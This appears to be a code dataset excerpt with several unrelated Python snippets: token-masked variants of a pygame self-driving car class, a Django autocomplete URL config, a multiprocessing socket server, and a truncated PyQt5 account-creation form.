list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n \"\"\"Car class for pygame simulation\"\"\"\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n <function token>\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n <function token>\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n<class token>\n"
] | false |
99,835 | 8e9e7811824477304231a393c7dc23d54bf526ad | #! python3
# minimum_cost_arborescence.py
V, E, r = list(map(int, input().split(' ')))
| [
"#! python3\n# minimum_cost_arborescence.py\n\nV, E, r = list(map(int, input().split(' ')))\n",
"V, E, r = list(map(int, input().split(' ')))\n",
"<assignment token>\n"
] | false |
99,836 | 03d683cce858817b2e8e42afcdf2bafb78437580 | import autocomplete_light
autocomplete_light.autodiscover()
from django.conf.urls import patterns, include
urlpatterns = patterns(
'',
(r'^autocomplete/', include('autocomplete_light.urls')),
)
| [
"import autocomplete_light\nautocomplete_light.autodiscover()\n\nfrom django.conf.urls import patterns, include\n\nurlpatterns = patterns(\n '',\n (r'^autocomplete/', include('autocomplete_light.urls')),\n)\n",
"import autocomplete_light\nautocomplete_light.autodiscover()\nfrom django.conf.urls import patterns, include\nurlpatterns = patterns('', ('^autocomplete/', include(\n 'autocomplete_light.urls')))\n",
"<import token>\nautocomplete_light.autodiscover()\n<import token>\nurlpatterns = patterns('', ('^autocomplete/', include(\n 'autocomplete_light.urls')))\n",
"<import token>\nautocomplete_light.autodiscover()\n<import token>\n<assignment token>\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n"
] | false |
99,837 | 7d23c92e4a434b15dbbe140d99490d05c160dc1b | # -*- coding: UTF-8 -*-
import Queue
import multiprocessing
import M6.Common.Protocol.Socket as Socket
import time
from ServerConf import ServerConf
from MoniterServer import MoniterServer
from ManagerServer import ManagerServer
__all__ = ['Server']
class Server():
def __init__(self, server_port, monitor_port, daemon_process, param=None,
max_process=3, process_time_out=-1, server_name=None):
"""
@param server_port: running server port
@param monitor_port: process moniter port
@param daemon_process: running process module
@param param: parameter use at daemon_process
@param max_process: number of simutaneously runing process
@prarm process_time_out: number of process time out
(process의 join parameter로 사용)
< 0: (Default) when ending until
= 0: not join
> 0: wait time
WARNING -todo...-
@param server_name: monitmoniter에 표시할 server이름
None: (Default) daemon_process에서 class이름을 확인하여 사용
"""
#Use ManagerServer
self.daemon_process = daemon_process
self.socket_queue = Queue.Queue()
self.param = param
#Use MoniterServer
self.monitor_dic = multiprocessing.Manager().dict()
if server_name is None:
server_name = daemon_process.__name__
#Setup Server Conf
self.conf = ServerConf(server_port, monitor_port,
server_name, max_process, process_time_out)
def run(self):
#start monitor
if self.conf.get_monitor_port() != 0:
monitor_server = MoniterServer(self.conf, self.monitor_dic, self.socket_queue)
monitor_server.setDaemon(True)
monitor_server.start()
#start process manager
manager_server = ManagerServer(self.conf, self.socket_queue, self.monitor_dic,
self.daemon_process, self.param)
manager_server.setDaemon(True)
manager_server.start()
self.sock = Socket.Socket()
self.sock.Bind(self.conf.get_server_port())
while True:
client_sock = self.sock.Accept()
if not client_sock:
break
print 'put', time.time()
self.socket_queue.put(client_sock)
if __name__ == '__main__':
class Test():
def __init__(self, socket, monitor, param):
import os
monitor.set_start_time('111111')
monitor.set_pid(os.getpid())
def run(self):
import time
time.sleep(5)
pass
#def __init__(self, server_port, monitor_port, daemon_process, param=None,
# max_process=3, process_time_out=-1, server_name=None):
Server(5001, 5002, Test, 'TestClass',
1, -1, None).run()
| [
"# -*- coding: UTF-8 -*-\nimport Queue\nimport multiprocessing\nimport M6.Common.Protocol.Socket as Socket\nimport time\n\nfrom ServerConf import ServerConf\nfrom MoniterServer import MoniterServer\nfrom ManagerServer import ManagerServer\n\n__all__ = ['Server']\n\nclass Server():\n def __init__(self, server_port, monitor_port, daemon_process, param=None,\n max_process=3, process_time_out=-1, server_name=None):\n \"\"\"\n @param server_port: running server port\n @param monitor_port: process moniter port\n @param daemon_process: running process module\n @param param: parameter use at daemon_process\n @param max_process: number of simutaneously runing process\n @prarm process_time_out: number of process time out\n (process의 join parameter로 사용)\n < 0: (Default) when ending until\n = 0: not join\n > 0: wait time\n WARNING -todo...-\n @param server_name: monitmoniter에 표시할 server이름\n None: (Default) daemon_process에서 class이름을 확인하여 사용\n \"\"\"\n\n #Use ManagerServer\n self.daemon_process = daemon_process\n self.socket_queue = Queue.Queue()\n self.param = param\n\n #Use MoniterServer\n self.monitor_dic = multiprocessing.Manager().dict()\n\n if server_name is None:\n server_name = daemon_process.__name__\n\n #Setup Server Conf\n self.conf = ServerConf(server_port, monitor_port,\n server_name, max_process, process_time_out)\n\n def run(self):\n #start monitor\n if self.conf.get_monitor_port() != 0:\n monitor_server = MoniterServer(self.conf, self.monitor_dic, self.socket_queue)\n monitor_server.setDaemon(True)\n monitor_server.start()\n\n #start process manager\n manager_server = ManagerServer(self.conf, self.socket_queue, self.monitor_dic,\n self.daemon_process, self.param)\n manager_server.setDaemon(True)\n manager_server.start()\n\n self.sock = Socket.Socket()\n self.sock.Bind(self.conf.get_server_port())\n while True:\n client_sock = self.sock.Accept()\n if not client_sock:\n break\n\n print 'put', time.time()\n self.socket_queue.put(client_sock)\n\nif __name__ == '__main__':\n class Test():\n def __init__(self, socket, monitor, param):\n import os\n monitor.set_start_time('111111')\n monitor.set_pid(os.getpid())\n\n def run(self):\n import time\n time.sleep(5)\n pass\n\n #def __init__(self, server_port, monitor_port, daemon_process, param=None,\n # max_process=3, process_time_out=-1, server_name=None):\n Server(5001, 5002, Test, 'TestClass', \n 1, -1, None).run()\n"
] | true |
99,838 | eb88c36500f857d47ef7e38641b9dcb47e9ad35e | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'createaccount.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_createaccount(object):
def setupUi(self, createaccount):
createaccount.setObjectName("createaccount")
createaccount.resize(800, 600)
self.centralwidget = QtWidgets.QWidget(createaccount)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.widget_2 = QtWidgets.QWidget(self.centralwidget)
self.widget_2.setStyleSheet("")
self.widget_2.setObjectName("widget_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.widget_3 = QtWidgets.QWidget(self.widget_2)
self.widget_3.setObjectName("widget_3")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)
self.horizontalLayout.setObjectName("horizontalLayout")
self.userlabel = QtWidgets.QLabel(self.widget_3)
font = QtGui.QFont()
font.setFamily("微軟正黑體")
font.setPointSize(28)
self.userlabel.setFont(font)
self.userlabel.setObjectName("userlabel")
self.horizontalLayout.addWidget(self.userlabel)
self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)
self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))
font = QtGui.QFont()
font.setPointSize(16)
self.userlineEdit.setFont(font)
self.userlineEdit.setStyleSheet("border-radius:15px;")
